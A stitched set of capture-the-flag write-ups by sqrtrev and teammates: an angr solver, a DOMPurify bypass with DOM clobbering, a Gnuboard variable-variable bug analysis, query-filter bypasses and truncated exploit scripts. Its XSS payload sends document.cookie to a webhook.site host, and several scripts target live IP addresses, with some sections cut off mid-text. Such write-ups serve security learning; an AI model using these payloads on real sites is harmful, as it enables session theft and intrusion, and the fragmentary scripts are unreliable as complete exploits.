SeungHyun Kim sqrtrev
# Code by sqrtrev@WreckTheLine
import angr

def main():
    # Load the challenge binary and start from a fully initialised state
    p = angr.Project("reversing")
    simgr = p.factory.simulation_manager(p.factory.full_init_state())
    # Explore until a state has printed "correct" on stdout
    simgr.explore(find=lambda s: b'correct' in s.posix.dumps(1))
    # Return the stdin that reaches that state (the solution input)
    return simgr.found[0].posix.dumps(0)
sqrtrev / gist:9fdd1df15dfce1e92f60308a3bce7723
Created September 21, 2020 06:22
bfnote write-up using a DOMPurify 0-day
Craft the URL via DOM clobbering
and XSS via a DOMPurify 0-day (now patched: https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d)
[<a id=a><a id=a name=b href="//webhook.site/f43558da-640a-4ad3-817e-6144d4bc2e7d/" />]
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=location.href=a.b.href+document.cookie">

L5D

by sqrtrev

# python2
# 0-day by Merona-Hunters (SeungHyun Kim, SeungJun Kim, MinKi Jang, DoHyun Lee)
POST /submit HTTP/1.1
Host: webp.bcactf.com:49153
Content-Length: 985
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://webp.bcactf.com:49153
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.272 Whale/2.9.118.16 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://webp.bcactf.com:49153/

Gnuboard (Author: sqrtrev)

Looking at https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L65, the code uses the HttpClient class to send a request to $authUrl. Here $authUrl is passed in via $_REQUEST (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33), so it is a value we control. At https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L176 the request is sent and, if it fails, the response body is stored in $netcancelResultString. Then, at https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L186-L187, a str_replace is performed, and this is where the vulnerability arises. Because of how PHP works, using a value in the form $$variable behaves like referencing the variable whose name is the contents of $variable. Therefore the first str_replace makes the code refer to the contents of $body, and the second str_replace lets us access whichever variable we want. Since $authToken is a value we control (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L31), we decided to use that variable. Suppose we pass authToken=flag and HttpClient->body returns authToken. During the str_replace, $$Http->body == $authToken. In other words, `$netca

We can save the payload in the username or somewhere else and then execute it by reading /proc/self/mem. Run both scripts at the same time: one injects payloads and the other searches for them. Since we are reading memory, some of the links the script outputs might expire.

#!/usr/bin/env python3
import requests

# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'

Using STTF (Scroll-To-Text-Fragment) and the nginx cache header, we can leak the admin's flag.

#!/usr/bin/env python3
import requests
import random
import time

target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting
We can create additional query variables using `;`, so we can bypass the filtering (they use parse_qsl to parse the query).
Payload:
/view?{MyClienID}=flag;/%2e%2e/=123

(Written by okas832 and Reinose. I just uploaded this)

Step 1. Communicate with server

Messages need to be serialized with protobuf to send data, but the protocol.proto file is not given. The serialized descriptor_pb2.FileDescriptorProto is at 0x416700:0x4168B0. We recovered protocol.proto by black-box analysis because we couldn't find related documents.

0A 0E 70 72 6F 74 6F 63 6F 6C 2E 70 72 6F 74 6F    filename: "protocol.proto"